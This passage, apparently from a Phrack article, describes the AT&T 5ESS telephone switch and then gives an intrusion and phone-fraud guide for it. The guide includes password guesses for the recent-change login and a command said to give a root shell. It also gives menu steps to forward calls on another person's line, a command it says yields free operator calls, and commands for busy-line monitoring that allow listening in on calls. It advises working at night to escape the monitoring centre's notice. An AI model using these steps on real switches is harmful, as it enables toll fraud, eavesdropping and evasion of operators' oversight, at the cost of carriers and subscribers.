Unit (TSIU) - 512 time slot capacity - Connects to the TMS over two 256-time slot Network Control and Timing (NCT) links. - Switches time slots from Interface Units to one of the NCT links (for intermodule calls). - Switches time slots from one Interface Unit to another within the SM (for intramodule calls). Digital Service Unit (DSU) - Local DSU provides high usage service circuits, such as tone decoders and generators, for lines and trunks terminated on the SM. - Global DSU provides low usage service circuits, such as 3-port conference circuits and the Transmission Test Facility, for all lines and trunks in the office (requires 64 time slots). The SM may be equipped with four types of Interface Units: Line Unit (LU) - For terminating analog lines. - Contains a solid-state two-stage analog concentrator that provides access to 64 output channels. The concentrator can be fully equipped to provide 8:1 concentration or can be fully equipped to provide 6:1 or 4:1 concentration. - Each TU requires 64 time slots. Trunk Unit (TU) - For terminating analog trunks. - Each TU requires 64 time slots. Digital Line Trunk Unit (DLTU) - For terminating digital trunks and RSM's. - Each fully equipped DLTU requires 256 time slots. - A maximum of 10 DSls maybe terminated on one DLTU. The SM may be equipped with any combination of LU's, TU's, DCLU's and DLTU's totaling 512 time slots. 5ESS System Software ~~~~~~~~~~~~~~~~~~~~ The 5ESS is a UNIX based switch. UNIX has played a large part in switching systems since 1973 when UNIX was use in the Switching Control Center System (SCCS). The first SCCS was a 16 bit microcomputer. The use of UNIX for SCCS allowed development in C code, pseudo code, load test, structure and thought. This led the development of the other switching systems which AT$T produces today (such at System 75, 85, 1AESS AP, and 5ESS). NOTE: You may hear SCCS called the "mini" sometimes The 5ESS's /etc/getty is not set up for the normal login that one would expect to see on a UNIX System. This is due to the different channels that the 5ESS has. The some channels are the TEST Channel, Maintenance Channel, and RC Channel (which will be the point of focus). Once you are on one channel you can not change the channel, as someone has said " it is not a TV!" You are physically on the channel you are on. Test Channel ~~~~~~~~~~~~ The TEST channel is where one can test lines, and test the switch itself. This is where operating support systems (such as LMOS) operate from. This channel allows one to monitor lines via the number test trunk aka adding a third trunk), voltage test and line seizure. Here is a list of OSSs which access the test channels on the 5ESS. Group Operating Support Systems Special Service Center SMAS via NO-Test SARTS (IPS) NO-TEST trunk (from the switch) TIRKS 17B and 17E test boards (CCSA net using X-Bar) RTS BLV POVT DTAC etc... Repair Service Bureau #16LTD #14LTD LMOS (IPS) MLT-2 ADTS TIRKS TFTP TRCO DAMT ATICS etc... SCC Channel ~~~~~~~~~~~ The SCC channel is where the SCC looks and watches the switch 24 hours a day, seven days a week! From this channel one can input RC messages if necessary. A lot of people have scanned these out, and though they were AMATs. Well this is in short, WRONG! Here is a sample buffering of what they are finding. ----------------------------------------------------------------------------- S570-67 92-12-21 16:16:48 086901 MDIIMON BOZOVILL DS0 A REPT MDII WSN SIGTYPE DP TKGMN 779-16 SZ 21 OOS 0 SUPRVSN RB TIME 22:16:48 TEN=14-0-1-3-1 TRIAL 1 CARRFLAG NC ID OGT NORMAL CALL CALLED-NO CALLING-NO DISCARD 0 S4C0-148963487 92-12-21 16:17:03 086902 MAIPR BOZOVILL DS0 OP:CFGSTAT,SM=1&&192,OOS,NOPRINT; PF S570-67 92-12-21 16:17:13 086903 S0 BOZOVILL DS0 M OP CFGSTAT SM 5 FIRST RECORD UNIT MTCE STATE ACTIVITY HDWCHK DGN RESULT LUCHAN=5-0-0-3-4 OOS,AUTO,FE BUSY INH CATP LUCHAN=5-0-0-2-5 OOS,AUTO,FE BUSY INH ATP LUCHAN=5-0-0-0-3 OOS,AUTO,FE BUSY INH ATP LUCHAN=5-0-0-3-5 OOS,AUTO,FE BUSY INH ATP LUHLSC=5-0-0-1 OOS,AUTO,FE BUSY INH ATP LUCHAN=5-0-0-0-2 OOS,AUTO,FE BUSY INH CATP LUCHAN=5-0-0-3-6 OOS,AUTO,FE BUSY INH ATP LUCHAN=5-0-0-1-4 OOS,AUTO,FE BUSY INH ATP S570-983110 92-12-21 17:09:53 144471 TRCE WCDS0 A TRC IPCT EVENT 2991 DN 6102330000 DIALED DN 6102220001 TIME 17:09:52 ------------------------------------------------------------------------------ This has nothing to do with AMA, this is switch output on say the SCC channel. This is used by the SCCS for logging, and monitoring of alarms. The whole point of this channel is to make sure the switch is doing what it should do, and to log all activity on the switch. NOTHING MORE! To go into these messages and say what they are would take far too long, order the OM manuals for the 5ESS, watch out, they are about 5 times the size of the IM (input manual) set. On average it takes someone three years of training to be able to understand all this stuff, there is no way anyone can write a little file in Phrack and hope all who read it understand everything about the 5ESS. RTFM! RC Channel ~~~~~~~~~~ The RC/V (Recent Change/Verify) Channel is where new features can be added or taken away from phone lines. This is the main channel you may come in contact with, if you come in contact with any at all. When one connects to a 5ESS RC/V channel one may be dumped to a CRAFT shell if the login has not been activated. Access to the switch when the login is active is controlled by lognames and passwords to restrict unwanted entry to the system. In addition, the SCC (Switching Control Center) sets permission modes in the 5ESS switch which control the RC (recent change) security function. The RC security function determines whether recent changes may be made and what types of changes are allowed. If a situation arises where the RC security function denies the user access to recent change via RMAS or RC channels, the SCC must be contacted so that the permission modes can be modified. (Hint Hint) The RC security function enables the operating telephone company to decide which of its terminals are to be allowed access to which set of RC abilities. NOTE that all verify input messages are always allowed and cannot be restricted, which does not help too much. The RC security data is not part of the ODD (office dependent data). Instead, the RC security data is stored in relatively safe DMERT operating system files which are only modifiable using the following message: SET:RCACCESS,TTY="aaaaa",ACCESS=H'bbbbb; where: aaaaa = Symbolic name of terminal in double quotes H' = Hexadecimal number indicator in MML bbbbb = 5-character hexadecimal field in 5E4 constructed from binary bits corresponding to RC ability. The field range in hexadecimal is from 00000 to FFFFF. This message must be entered for each type terminal (i.e. "aaaaa"="rmas1", "rmas2", etc., as noted above in TTY explanations). NOTE: Order IM-5D000-01 (5ESS input manual) or OM-5D000-01 (5ESS output manual) for more information on this and other messages from the CIC at 1-800-432-6600. You have the money, they have the manuals, do not ask, just order. I think they take AMEX! When the message is typed in, a DMERT operating system file is created for a particular terminal. The content of these files, one for each terminal, is a binary field with each bit position representing a unique set of RC abilities. Conversion of this hexadecimal field to binary is accomplished by converting each hexadecimal character to its equivalent 4-bit binary string. ---------------------------------------------------------- HEX BINARY | HEX BINARY | HEX BINARY | HEX BINARY -------------|--------------|--------------|-------------- 0 0000 | 4 0100 | 8 1000 | C 1100 -------------|--------------|--------------|-------------- 1 0001 | 5 0101 | 9 1001 | D 1101 -------------|--------------|--------------|-------------- 2 0010 | 6 0110 | A 1010 | E 1110 -------------|--------------|--------------|-------------- 3 0011 | 7 0111 | B 1011 | F 1111 ---------------------------------------------------------- Each bit position corresponds to a recent change functional area. A hexadecimal value of FFFFF indicates that all bit positions are set to 1 indicating that a particular terminal has total RC access. Also, verify operations as well as lettered classes are not included in the terminals security scheme since all terminals have access to verify views and lettered classes. In addition, maintenance personnel are able to verify the security code for any terminal by typing the following message from either the MCC (Master Control Center) or SCCS (Switching Control Center System) Mini terminal: OP:RCACCESS,TTY="xxxxx"; where: xxxxx = symbolic name of terminal in double quotes. Each bit position corresponds to a recent change functional area. To ensure redundancy, DMERT operating system files are backed up immediately on disk by the SCC. The input message that defines the password and CLERK-ID (another name for username) is in the Global RC feature. This input message defines a clerk-id and associated password or deletes an existing one. (Recall that CLERK-ID and PASSWORD are required fields on the Global RC Schedule view 28.1 in RCV:MENU:APPRC, but more on this later) This new input message is as follows: GRC:PASSWORD,CLERKID=xxxxxxxxxx,[PASSWD=xxxxxxxx|DELETE] Note: CLERKID can be from 1 to 10 alphanumeric characters and PASSWORD from 1 to 8 alphanumeric characters. This input message can only be executed from the MCC or SCCS terminals, and only one password is allowed per CLERK-ID. To change a clerk-id's password, this message is used with the same CLERK-ID but with a different password. Global RC Schedule View 28.1 from the RC/V Recent Change Menu System ---------------------------------------------------------------------------- 5ESS SWITCH WCDS0 RECENT CHANGE 28.1 GLOBAL RECENT CHANGE SCHEDULING *1. GRC NAME __________ *2. SECTION _____ #3. CLERK ID __________ #4. PASSWORD ________ 5. MODE _______ 6. RDATE ______ 7. RTIME ____ 8. SPLIT _ 9. SPLIT SIZE _____ 10. MAX ERRORS _____ 11. VERBOSE _ ---------------------------------------------------------------------------- When the security is set up on the RC/V channel, one will see: ---------------------------------------------------------------------------- 5ESS login 15 WCDS0 5E6(1) ttsn-cdN TTYW Account name: ---------------------------------------------------------------------------- There are no defaults, since the CLERK-ID and the password are set by craft, but common password would be the name of the town, CLLI, MANAGER, SYSTEM, 5ESS, SCCS1, SCC, RCMAC, RCMAxx, etc,... If one sees just a " < " prompt you are at the 'craft' shell of the RC/V channel, the 5E login has not been set. The Craft shell is running on the DMERT (which is a UNIX environment development operating system, a System V hack). The Craft shell prompt is a "<". From this shell one will see several error messages. Here is a list and what they mean: Error Message Meaning ?A Action field contains an error ?D Data field contains an error ?E Error exists in the message but can not be resolved to the proper field (this is the "you have no idea" message) ?I Identification field contains an error ?T Time-out has occurred on channel ?W Warning exists in input line Other output message meanings, from the RC/V craft menu. OK Good PF Printout follows RL Retry later NG No good, typically hardware failure (ie: SM does not exist) IP In progress NA The message was not received by the backup control process When inputing RC messages it is best to do it in the middle of the day since RC messages are sent to each channel! The SCC is watching and if there are RC messages running across at 3 in the morning, the SCC is going to wonder what the hell RCMAC (Recent Change Memory Administration Center) is doing at three in the morning! However, one may be hidden by MARCH's soaking, and the night shift at the SCC are overloaded and may miss what is going on while correcting other major problems. So it is up to you. DMERT ~~~~~ The DMERT (Duplex Multiple Environment Real Time) uses the Western Electric (another name for AT$T!) 3B20D Duplex processor (or 2 3B20S Simplex processors). The DMERT software totals nearly nine thousand source files, one million lines of non-blank source code, and was developed by approximately 200 programers. There are eight main releases of this software, they are referred to as generics (like 5E4.1, 5E4.2, to 5E8.1 also seen as 5E4(1), 5E4(2) to 5E8(1), this can be though of as DOS version). DMERT is similar to regular UNIX but can be best described as a custom UNIX system based on the 3B20D, the DMERT OS can be ported to PDP-11/70s or a large IBM Mainframe. The DMERT operating system is split both logically and physically. Physically, the software is evenly divided across the five (there were seven Software Development systems all running a 3B20S where the DMERT code was written) Software Development systems. Logical, the software is divided into twenty-four different subsystems. To access this from the "craft" shell of the RC/V channel, type: RCV:MENU:SH! NOTE: This will dump one to a root shell, from which VaxBuster's (Who knows nothing about VAXen, always wondered about him) file on how to redirect a TTY may come in useful. Programing the 5ESS ~~~~~~~~~~~~~~~~~~~ When programing the 5ESS there are things one should know, the first is that one has a lot of power (just keep 911 in mind, it would be foolish to even think of disrupting anyones service. 911 is there for a reason, it should STAY that way). And anything one does is logged, and can be watched from the SCC. Note that the night SCC crew is a lot more lax on how things are done then the day shift, so it would be best to do this at night. I could tell you how to crash the switch in two seconds, but that is not the point here. Destroying something is easy, anyone can do that, there is no point to it. All that taking down a switch will do is get one into jail, and get sued if someone needed 911 etc,... (I think SRI is wishing they had talked to me now). RC from Craft Shell on RC/V Channel ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ RC and VFY is complex from the craft shell on the RC/V channel. This is called the input text option. It is accessed by using the RCV:APPTEXT: This gets a little complex to follow, but the best thing to do is to order the Manual 235-118-215 Recent Change Procedures Text Interface [5E4] it is $346.87, another good one to get is 235-118-242, for $413 even and last, but the best is 235-118-243, this beast is only $1344.63 what a deal. When calling the CIC they will transfer you to a rep. from your area. Gets to be kind of a pain in the ass, but.. Anyways, back on track: RCV:APPTEXT:DATA[,SUMMARY|,NSUMMARY][,VFYIMMED|,VFYEND][,VFYNMVAL|,VFYSCIMG] [,DEVICE={STDOUT|ROP|ROP0|FILE|TTYx}],FORM=...,DATA,FORM=...,END; DATA - This is for more then one RC operation in the same command FORM - The format that is to be used SUMMARY - Turns on one line summaries on the read only printer (ROP) (DEFULT) NSUMMARY - Turns off one line summary logging by the ROP VFYIMMED - Prints out verifies (VFYs) immediately, does not wait for session end. VFYEND - Prints out all VFYs at session end, this is the DEFULT. VFYNMVAL - Print verify output in name-value pair format, this must be directed into a file (see DEVICE). VFYSCIMG - Makes output into screen size image (DEFULT). DEVICE - Redirect verify output to a device other than ones screen. ROP/ROP0 - Send verify output to the ROP STDOUT - Send verify output to ones screen (DEFULT) TTYx - Send verify output to any valid tty (such as ttya and ttyv) that exists in "/dev." You must use the tty name, not tty number. FILE - Send verify output to a file in "/rclog". The file will be prefixed with "RCTX", and the user will be given the name of the file at the beginning and end of the APPTEXT session. END - END of message. If the parameter is not entered on the command line, it may be entered after the APPTEXT process begins, but must be entered prior to the first "FORM=" statement. Here is a example of a MML RCV:APPTEXT. rcv:apptext:data,form=2v1&vfy,set="oe.entype"&lset="oe.len"&xxxxxxxx,pty=i,vfy! The 2V1 may look strange at first, it may help getting use to the basics first. To just VFY telephone numbers, just do a: RCV:APPTEXT:DATA,FORM=1V6-VFY,TN=5551212,VFY,END! Though I can not really explain this any more then I have just due to time and space. These input messages may look complex at first, but are really simple, and much better then dealing with the menu system, but you will need to learn RC yourself! No one can explain it to you. Pulling AMA from the RC/V channel Craft Shell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Pulling AMA up is done with one command. The command is: OP:AMA:SESSION[,ST1|,ST2]; This command will request a report of the current or most recent automatic message accounting (AMA) tape. ST1 and ST2 are the data streams. Pulling up out of Service Lines, Trunks or Trunk Groups ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ One may want to pull up all the out of service lines, trunks, or trunk groups for many reasons. These reasons i will not go into, but from which lines can be set up. The command to do this from the craft shell is a PDS command, this command is with a 'ball bat' (a `` ! ''). OP:LIST,LINES[,FULL][,PRINT][;[a][,b][,c][,d][,e]]! OP:LIST,TRUNKS[,FULL][,PRINT][;[a][,b][,c][,d][,e]]! OP:LIST,TG [,FULL][,PRINT][;[a][,b][,c][,d][,e]]! FULL - All (primary and pending) are printed. Note FULL is not the default when inputing this command. PRINT - Print to the ROP in the CO. (Not a good idea) a-e - This is port status to match against the subset of trunks, lines or trunk groups that are specified. (This is required input for FULL) The 5ESS RC/V Menu Shell ~~~~~~~~~~~~~~~~~~~~~~~~ To access this shell from the RC/V channel craft shell, type: RCV:MENU:APPRC at the `` < '' prompt. To access the 5ESS RC/V menu system from the MCC, STLWS, and TLWS channel/terminals, one uses what are called pokes. The poke that is used here to access the RC/V Menu system on the 5ESS is 196. Type 196 at the `` CMD< '' prompt, and you are on the RC/V menu system of the 5ESS switch. This will cause ``RC/V 196 STARTING'' and ``RC/V 196 COMPLETED'' to be printed out on the ROP. Either way, this will toss you into a menu system. The main menu looks like this: ------------------------------------------------------------------------------ 5ESS SWITCH WCDS0 RECENT CHANGE AND VERIFY CLASSES H RCV HELP 9 DIGIT ANALYSIS 20 SM PACK & SUBPACK A ADMINISTRATION 10 ROUTING & CHARGING 21 OSPS FEATURE DEFINITION B BATCH INPUT PARMS 11 CUTOVER STATUS 22 ISDN -- EQUIPMENT 1 LINES 12 BRCS FEATURE DEFINITION 23 ISDN 2 LINES -- OE 13 TRAFFIC MEASUREMENTS 24 APPLICATIONS PROCESSOR 3 LINES -- MLHG 14 LINE & TRUNK TEST 25 LARGE DATA MOVEMENT 4 LINES -- MISC. 15 COMMON NTWK INTERFACE 26 OSPS TOLL & ASSIST/ISP 5 TRUNKS17 CM MODULE 27 OSPS TOLL & ASSIST 7 TRUNKS - MISC. 18 SM & REMOTE TERMINALS 28 GLOBAL RC - LINES 8 OFFICE MISC. & ALARMS 19 SM UNIT Menu Commands: ------------------------------------------------------------------------------ The help menus for the 5ESS switch are lame, but I though that it would be good to show them to you just for the hell of it, because it does explain a little about the switch. ------------------------------------------------------------------------------ SCREEN 1 OF 7 5ESS SWITCH RECENT CHANGE VIEW H.1 COMMANDS FOR MENU PAGES H - Explains commands for MENU or views. If you enter H again, then it will display next HELP page. H# - Select HELP page. (# - help page number) Q - Quit Recent Change and Verify. R - Change mode to RECENT CHANGE V - Change mode to VERIFY < - Go to CLASS MENU page. # - If on CLASS MENU page Go to a VIEW MENU page #. # - If on VIEW MENU page Go to a RECENT CHANGE or VERIFY VIEW #. #.# - Go to a RECENT CHANGE or VERIFY VIEW. (CLASS#.VIEW#) --------------------------------------------------- SCREEN 2 OF 7 5ESS SWITCH RECENT CHANGE VIEW H.1 COMMANDS FOR MENU PAGES #R - Go to Recent Change view for read. #I - Go to Recent Change view for insert. #D - Go to Recent Change view for delete (only print Key fields). #DV - Go to Recent Change view for delete with verify (print all fields). #U - Go to Recent Change view for update. #UI - Go to Recent Change view for update in insert mode (user can change each field sequentially without typing field number). #V - Go to Verify view. #N - Go to next menu page. Back to the 1st page if there's no next page. ------------------------------------------------ SCREEN 3 OF 7 5ESS SWITCH RECENT CHANGE VIEW H.1 COMMANDS FOR BATCH BMI - Delayed Activation Mode. Choose time or demand release (for time release add service information). Select view number for Recent Change. BMD - Display Status of Delayed Activation Recent Changes. BMR - Release a file of Recent Changes stored for Delayed Activation. IM - Immediate Release Mode. ________________________________________________ SCREEN 4 OF 7 5ESS SWITCH RECENT CHANGE VIEW H.1 COMMANDS FOR VIEWS < - In first field: Leave this view and return to select view number. < - Not in first field: Return to first field. ^ - In first field: Select new operation for this view. ^ - Not in first field: Return to previous field. > or ; - Go to end of view or stop at next required field. * - Execute the operation or go to next required field. ? - Toggle help messages on and off. Q - Abort this view and start over. V - Validate input for errors or warnings. ________________________________________________ SCREEN 5 OF 7 5ESS SWITCH RECENT CHANGE VIEW H.1 COMMANDS FOR VIEWS R - Review view from Data Base. I - Insert this view into Data Base. U - Update this view into Data Base. D - Delete this view from Data Base (only print Key fields). C - CHANGE: Change a field - All fields may be changed except key fields when in the update mode only. C - CHANGE-INSERT: Allowed in the review mode only - Allows you to review C - CHANGE-INSERT: Allowed in the review mode only - Allows you to review a view and then insert a new view with similar field. You must change the key fields to use this facility. You may change other fields as required by the new view. P - Print hard copy of screen image (must have RC/V printer attached). ________________________________________________ SCREEN 6 OF 7 5ESS SWITCH RECENT CHANGE VIEW H.1 COMMANDS FOR VIEWS The following are used only on views containing LISTS. ` - Blank entire row. - Sets this field to its default value. : - Sets this row to its default value. [ - Go backward to previous row. ] - Go forward to next row. ; - Go to end of view or stop at next required field. # - Go to end of list and stop at next non-list field. { - Delete current row and move next row to current row. } - Move current row to next row and allow insert of row. = - Copy previous row to current row. * - Execute the operation or stop at next required field. ________________________________________________ SCREEN 7 OF 7 5ESS SWITCH RECENT CHANGE VIEW H.1 COMMANDS FOR AUTOMATIC FORMS PRESENTATION If RC/V is in automatic forms presentation and "Q" or "q" is entered for the operation, the following commands are available. A - Abort form fields. RC/V stays in the current form. B - Bypass form. Go to next form using automatic forms presentation. C - Cancel automatic forms presentation. The previous menu will be displayed. H - Display automatic forms presentation help messages. < - Bypass form. Go to next form using automatic forms presentation. ______________________________________________________________________________ When accessing the databases, here is a list of database access selections: I (insert) - Insert new data R (review) - Review existing data U (update) - Update or change existing data D (delete) - Delete (remove) unwanted data from the data base V (verify) - Verify the data in the data base. These are to be entered when one sees the prompt: ----------------------------------------------------------------------------- Enter Database Operation I=Insert R=Review U=Update D=Delete : _ ------------------------------------------------------------------------------ When using the RC/V menu system of the 5ESS, you may go and just keep going into sub-menus, and fall off the end of the Earth. Here are the navigational commands that are used to move around the menu system. As seen from the RC/V menu system help, you see "SCREEN X out of X." This means that there are so many screens to go and to move between the screens you use the `` < '' to move back (toward main menu) and `` > '' to move to the last menu. I know it is shown in the help menu, but it is not explained like it needs to be. Batch Input ~~~~~~~~~~~ The Batch Input feature for the 5ESS switch allows recent changes (RC) to be entered at any date and time when the RC update would be performed. This allows RC input to be entered quickly, and for a large number of inputs. The large numbers of RC input can be released quickly in batch mode. The RC input can then be entered at any time, stored until needed, and then released for use by the system whenever needed, at any specific date and/or time. First and second level error correction is done during batch input. There are several different modes of batch input. These are: BMI - batch mode input - TIMEREL and DEMAND BMD - batch mode display BMR - batch mode release BMI - Batch Mode Input - TIMEREL and DEMAND Entering BMI (Batch Mode Input), one types `` BMI '' at the RC/V menu prompt. Once entering, you will be prompted with whether the input is DEMAND (demand) or TIMEREL (Time Release). DEMAND input allows one to manual have the batch update the database, TIMEREL is automatic. TIMEREL has one enter a time and date. When using DEMAND, you will be prompted for the file name. The file will be in `` /rclog '' in the DMERT OS. In TIMEREL, you will be prompted with the CLERK-ID, which in this case is the file name for the file in the `` /rclog ''. Then for VERBOSE options, the RC SRVOR (Recent Change Service Order) is displayed on the screen. -RC SRVOR View in the BMI TIMEREL Batch Option- ------------------------------------------------------------------------------ 5ESS SWITCH RECENT CHANGE B.1 SERVICE ORDER NUMBER VIEW *1. ORDNO __________ *2. ITNO ____ *3. MSGNO ____ #4. RDATE ______ #5. RTIME ____ Enter Insert, Change, Validate, or Print: ----------------------------------------------------------------------------- ORDNO = Service Order Number ITNO = Item Number MSGNO = Message Number RDATE = Release Date (Update database Date) RTIME = Release Time (Update database Time) BMD - batch mode display BMD is a "mask" of RC/V done from the RC/V channel craft shell, by using the REPT:RCHIST or a pseudo menu system. All transactions are displayed on the ROP, though the data could also be sent to a file in the `` /rclog '' in DMERT. The Pseudo menu system looks like: ---------------------------------------------------------------------------- 1. Summary of clerk activity 2. Activity by service order number 3. Activity by clerk ID 4. Return to view or class menu. ---------------------------------------------------------------------------- 1 allows one to view the "DELAYED RELEASE SUMMARY REPORT." 2 produces a "DELAYED RELEASE REPORT BY SERVICE ORDER." 3 produces the "DELAYED RELEASE REPORT BY CLERK ID." 4 Return to view or class menu, self-explanatory. REPT:RCHIST - BMD The REPT:RCHIST BMD (Text) command is done from the RC/V channel craft shell. The command synopsis is: 5E2 - 5E5 (Generics) REPT:RCHIST,CLERK=[,FORMAT={SUMMARY|DETAIL}]{[,ALL]|[,PENDING][,COMPLETE] [,ERROR][,DEMAND]}[,DEST=FILENAME][,TIME=XXXXXXXXXX]; 5E6 - 5E8 (Generics) REPT:RCHIST,CLERK=a[,FORMAT={SUMMARY|DETAIL}] {,ALL|,b}[,DEST={c|FILE}] [,TIME=XXXXXXXXXX]; SUMMARY - Report selection, format by key. DETAIL - Report selection for Recent Change entire. ALL - Report all recent changes. PENDING - Report pending recent change input. COMPLETE - Report released recent changes that was successful when completed. FILE - Name for file in /rclog ERROR - Report recent changes released with error. DEMAND - Report demand recent changes. TIME=XXXXXXXXXX - XX - mounth, XX - day, XX - hour, XX minute, XX - Second BMR - batch mode release This is the manual release (updating) of the 5ESS database. This is done from the RC/V channel craft shell. The command that is used is the EXC:RCRLS input message. There is no real need to go into this message. Adding RCF (Remote Call Forward) on a 5ESS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. At the "MENU COMMANDS" commands prompt of the 5ESS main menu in the RC/V APPRC menu system of the 5ESS, enter '12' for the "BRCS FEATURE DEFINITION". Then access screen '1.11', this is the BRCS screen. When it asks you to 'ENTER DATABASE OPERATION' enter "U" for Update and hit return. NOTE: When at menu '12,' you will NOT see '1.11' listed in the menu options. By just accessing menu '1' you will not be able to add features. This is a problem with the 5ESS menu system. 2. Type in the Telephone Number. It should look like this: ------------------------------------------------------------------------------ Mon Feb 31 09:09:09 2001 RFA_TN ------------------------------------------------------------------------- 5ESS SWITCH WCDS0 SCREEN 1 OF 2 RECENT CHANGE 1.11 BRCS FEATURE ASSIGNMENT (LINE ASSIGNMENT) *1. TN 5551212 * 2. OE _ ________ 3. LCC ___ 4. PIC 288 *5. PTY _* 6. MLHG ____ 7. MEMB ____ 8. BFGN _______ _ FEATURE LIST (FEATLIST) ROW 11. FEATURE A P 15. FEATURE A P 19. FEATURE A P 23. FEATURE A P 1. /CFV N _ ________ _ _ ________ _ _ ________ _ _ 2. ________ _ _ ________ _ _ ________ _ _ ________ _ _ 3. ________ _ _ ________ _ _ ________ _ _ ________ _ _ 4. ________ _ _ ________ _ _ ________ _ _ ________ _ _ ------------------------------------------------------------------------------ and will prompt you with: ------------------------------------------------------------------------------ Enter Insert, Change, Validate, screen#, or Print: _ form operation prompt ------------------------------------------------------------------------------ I - to insert a form C - to change a field on a form V - to validate the form A - to display the desired screen number P - to print the current screen U - to update the form Enter `` C '' to change, access filed 11 and row 1 (goto the /CFV wherever it may be) or add /CFR if it is not there. If it does though, leave the "A" (Active) field "N" (Yes or No). Change the P (Presentation) column to "U" (Update). Then Hit Return. NOTE: Different Generics have other fields, one of them being a AC (Access Code) field. This field is a logical field, that mean only accepts a "Y" for yes and "N" for no. Also when adding the feature to the switch, the row and field numbers may not be shown, but will always follow this pattern. Also note that the /CFV (Call forwarding variable) feature may not be there, there maybe no features on the line. These examples are from Generic 4 (2). Here is a example of 5E8 (which is not used too many places, but this is what menu 1.11 in the BRCS Feature Definition looks like: ------------------------------------------------------------------------------- 5ESS SWITCH SCREEN 1 OF 2 RECENT CHANGE 1.11 (5112,5113)BRCS FEATURE ASSIGNMENT (LINE) (*)1. TN _______ (*)2. OE _ ________ 3. LCC ___ 4. PID ___ (*)6. MLHG ____ 8. BFGN _______ _ (*)5. PTY _(*) 7. MEMB ____ 11. FEATURE LIST (FEATLIST) ROW FEATURE A P AC R ROW FEATURE A P AC R ROW FEATURE A P AC R 1 ________ _ _ _ _ 8 ________ _ _ _ _ 15 ________ _ _ _ _ 2 ________ _ _ _ _ 9 ________ _ _ _ _ 16 ________ _ _ _ _ 3 ________ _ _ _ _ 10 ________ _ _ _ _ 17 ________ _ _ _ _ 4 ________ _ _ _ _ 11 ________ _ _ _ _ 18 ________ _ _ _ _ 5 ________ _ _ _ _ 12 ________ _ _ _ _ 19 ________ _ _ _ _ 6 ________ _ _ _ _ 13 ________ _ _ _ _ 20 ________ _ _ _ _ 7 ________ _ _ _ _ 14 ________ _ _ _ _ 21 ________ _ _ _ _ Enter Insert, Change, Validate, screen#, or Print: _ ------------------------------------------------------------------------------- Hit Return twice to get back to "ENTER UPDATE, CHANGE, SCREEN #, OR PRINT:". Enter a "U" for update and hit Return. It will say "FORM UPDATE". 3. Next access screen 1.22, call forwarding (line parameters) or it will just come up automatically if you set the "P" to "U". ------------------------------------------------------------------------------ Mon Feb 31 09:09:09 2001 RCFLNTN ---------------------------------------------------------------------- 5ESS SWITCH WCDS0 RECENT CHANGE 1.22 CALL FORWARDING (LINE PARAMETERS) *1. TN 5551212 *6. FEATURE CFR 9. FWDTODN ______________________________ 10. BILLAFTX 0 16. SIMINTER 99 11. TIMEOUT 0 17. SIMINTRA 99 12. BSTNINTVL 0 18. CFMAX 32 13. CPTNINTVL 0 19. BSRING N ------------------------------------------------------------------------------- 4. If you used the automatic forms presentation, it will have the telephone number already on LINE1. If not retype the telephone number you want forwarded. The bottom of the screen will say "ENTER UPDATE, CHANGE, VALIDATE OR PRINT:", type "C" for change and hit return. 5. When it says CHANGE FIELD type "9" and enter your forward to DN (Destination Number) including NPA if necessary. This will put you back to the "CHANGE FIELD" prompt. Hit return again for the "ENTER UPDATE, CHANGE, VALIDATE OR PRINT:". Hit "U" for Update form and wait for "FORM UPDATED". 6. Lastly, access screen 1.12, BRCS FEATURE ACTIVATION (LINE ASSIGNMENT). At the prompt enter a "U" for Update, and on ROW 11 Line 1 (or wherever), change the "N" in column "A" to a "Y" for Yes, and you are done. Adding other features ~~~~~~~~~~~~~~~~~~~~~ To add other features onto a line, follow the same format for adding the /CFR, but you may not need to access 1.22. Some other features are: Feature Code: Feature Name: /LIDLXA - CLID /CFR - Remote Call Forward /CWC1 - Call Waiting /CFBLIO - call forward busy line i/o /CFDAIO - call forward don't answer i/o /CFV - call forwarding variable /CPUO - call pick up o !used in the selq1 field! /CPUT - call pick up t !used in the tpredq field! /CWC1D - Premiere call waiting /DRIC - Dist. ring /IDCT10 - Inter room ID /IDCTX2 - 1digit SC /IDCTX2 - Interoom ID 2 /IDCTX2 - Premiere 7/30, convenience dialing /IDCTX3 - Premiere 7/30, no cd /IDMVP1 - Premiere 2/6, no convenience dialing /IDMVP2 - Premiere 2/6, CD, not control sta. /IDMVP3 - Premiere 2/6, CD, control station /MWCH1 - Call hold /MWCTIA2 - Call transfer 2 /TGUUT - Terminal group ID number with TG view (1.29). ANI/F the whole switch ~~~~~~~~~~~~~~~~~~~~~~~ Automatic Number Identification failure (also called "dark calls") are caused by variety of different things. To understand this better, here are the technical names and causes, note this is not in stone and the causes are not the only causes for a ANI-F to occur. ANF -- Failure to receive automatic number identification (ANI) digits on incoming local access and transport area (LATA) trunk. ANF2 -- Automatic number identification (ANI) collected by an operator following a failure to receive ANI digits on an incoming centralized automatic message accounting (CAMA) trunk from the DTMF decoder. ANI -- Time-out waiting for far off-hook from Traffic Service Position System (TSPS) before sending ANI digits. Though, I have always wondered how to set one up myself in a safe way. One way nice way to get ANI/F through a 5ESS to use a inhibit command. INH:CAMAONI; The command will inhibits centralized automatic message accounting (CAMA) operator number identification (ONI) processing. This is done from the DTMF decoder (going over later). This message will cause a minor alarm too occur. If in the CO when the alarm occurs, you will here this bell all the time, because something is always going out. In this case, this alarm is a level 1 (max to five) and the bell will ring once. Once this message is inputed, all calls through CAMA operator will be free of change. So just dial the operator and you will have free calls. To place this back on the switch, just type: ALW:CAMAONI; and the minor alarm will stop, and things will go back to normal. Setting up your own BLV on the 5ESS from the Craft shell RC/V Channel ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well, we have come to the fun part, how to access the No-Test trunk on the 5ESS (this is also called adding the third trunk). I will not be too specific on how to do this. You will need to figure out just how to do this. The first thing you want to do is to request a seizure of a line for interactive trunk and line testing. One must assign a test position (TP). SET:WSPHONE,TP=a,DN=b SET:WSPOS,TP=a,DN=b a = A number between 1 and 8 b = The number you wish assigned to the test position This will chose a number to be the test number on the switch. Now using the CONN:WSLINE one can set up a BLV. CONN:WSLINE,TP=a,DN=b; a = TP that you set from the SET:WSPOS b = The number you want to BLV To set this up on a MLHG (can come in real useful for those peksy public packet switched networks), do a: 